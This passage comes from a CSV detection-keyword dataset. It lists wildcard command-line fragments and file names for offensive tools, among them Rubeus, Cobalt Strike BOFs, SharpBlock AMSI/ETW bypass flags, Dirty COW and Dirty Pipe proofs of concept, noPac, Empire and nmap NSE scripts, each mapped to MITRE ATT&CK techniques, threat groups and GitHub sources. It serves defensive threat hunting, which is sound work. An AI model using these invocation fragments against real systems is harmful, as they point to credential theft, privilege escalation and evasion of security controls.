T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"* -DestHost * -DestPort 5555 -UseDefaultProxy*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"* detect-hooks.c *","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"* dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* diagrun=true service=DNS* dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* DInvokeResolver.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"* dir /s */ Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* dirty.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" +"* dirtycow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"* Dirty-Pipe.*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"* Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"* --disable-bypass-amsi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"* --disable-bypass-cmdline*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"* --disable-bypass-etw*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --dll * --only *AmsiScanBuffer*AmsiScanString*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* --dll --dllhijack *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -dns_stager_prepend *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* -dns_stager_subhost *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"* dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dnslog-cn.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* dns-nsec3-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-nsec-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-nsid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-random-srcport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-random-txid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -domain * /dc * /service cifs /ptt*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"* --domain * --kerberos*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* domainDumper*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"* domainhunter *","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain 